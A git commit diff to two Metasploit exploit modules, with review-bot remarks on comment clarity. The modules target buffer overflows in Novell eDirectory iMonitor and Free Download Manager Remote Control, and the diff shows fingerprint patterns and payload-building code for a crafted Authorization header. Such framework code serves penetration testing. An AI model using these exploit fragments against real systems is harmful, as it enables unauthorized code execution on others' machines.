add more http fingerprints
git-svn-id: file:///home/svn/framework3/trunk@9812 4d416f70-5f16-0410-b530-b9f4589650daunstable
parent
e765553d26
commit
6d23204c6f
|
@ -14,6 +14,8 @@ require 'msf/core'
|
|||
class Metasploit3 < Msf::Exploit::Remote
|
||||
Rank = GreatRanking
|
||||
|
||||
HttpFingerprint = { :pattern => [ /DHost\//, /HttpStk\// ] } # custom port
|
||||
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
|
||||
def initialize(info = {})
|
||||
|
@ -23,6 +25,9 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
This module exploits a stack buffer overflow in eDirectory 8.7.3
|
||||
iMonitor service. This vulnerability was discovered by Peter
|
||||
Winter-Smith of NGSSoftware.
|
||||
|
||||
NOTE: repeated exploitation attempts may cause eDirectory to crash. It does
|
||||
not restart automatically in a default installation.
|
||||
},
|
||||
'Author' => [ 'anonymous', 'Matt Olney <scacynwrig@yahoo.com>' ],
|
||||
'License' => BSD_LICENSE,
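Review bot: The trailing comment `# custom port` on the new `HttpFingerprint` line does not say which part of the HTTP response the two patterns are compared with, or what the port has to do with the check. A maintainer therefore cannot tell from this line when the module will decline to run against a host. It is also not stated whether `/DHost\//` and `/HttpStk\//` must both match or whether either one is enough. I would replace the trailing comment with a short comment above the constant, for example `# Server banner of the iMonitor HTTP stack; service listens on a non-default port`. That wording is inferred from the pattern names, so the author should confirm it. The class body continues outside the visible hunks.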
|
||||
|
|
|
@ -14,6 +14,13 @@ require 'msf/core'
|
|||
class Metasploit3 < Msf::Exploit::Remote
|
||||
Rank = GreatRanking
|
||||
|
||||
# w/auth required: [*] x.x.x.x ( 401-Basic realm="FDM Remote control server" )
|
||||
# w/o auth: <title>FDM remote control server</title>
|
||||
# w/o auth: <div align="right"><span class="style1"><span class="style4">Free Download Manager remote control server.</span><br />
|
||||
# <span class="style4">Version 1.0.</span> </span></div>
|
||||
# Extra url: /compdlds.req
|
||||
HttpFingerprint = { :pattern => [ /(FDM Remote control server|Free Download Manager)/i ] } # XXX: A custom body check would be nice too
|
||||
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
|
||||
def initialize(info = {})
|
||||
|
@ -22,8 +29,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'Description' => %q{
|
||||
This module exploits a stack buffer overflow in Free Download Manager
|
||||
Remote Control 2.5 Build 758. When sending a specially crafted
|
||||
Authorization header, an attacker may be able to execute
|
||||
arbitrary code.
|
||||
Authorization header, an attacker may be able to execute arbitrary code.
|
||||
},
|
||||
'Author' => [ 'MC' ],
|
||||
'License' => MSF_LICENSE,
|
||||
|
@ -57,11 +63,13 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
sploit = rand_text_alpha_upper(1012 - payload.encoded.length) + payload.encoded
|
||||
sploit << [target.ret].pack('V') + make_nops(4) + [0xe8, -575].pack('CV')
|
||||
sploit = Rex::Text.encode_base64(sploit)
|
||||
|
||||
print_status("Trying target #{target.name}...")
|
||||
|
||||
send_request_raw({
|
||||
'headers' => { 'Authorization' => "Basic #{Rex::Text.encode_base64(sploit)}" }
|
||||
send_request_raw(
|
||||
{
|
||||
'headers' => { 'Authorization' => "Basic #{sploit}" }
|
||||
}, 2)
|
||||
|
||||
handler
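Review bot: The comment block above the new `HttpFingerprint` lists two responses without authentication where the product name appears only in the HTML body, yet the trailing `XXX` note says a body check does not exist. From the hunk it is therefore unclear whether the fingerprint can match a server that has authentication disabled. The comment should state what the pattern is actually compared with, for example `# matched against the 401 realm string only; body-only (no-auth) responses are not covered yet`. This is inferred from the comments and should be confirmed. The capture group in the pattern is not used and can be dropped: `/FDM Remote control server|Free Download Manager/i`. The method around the last hunk starts and ends outside the visible lines.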
|
||||
|
|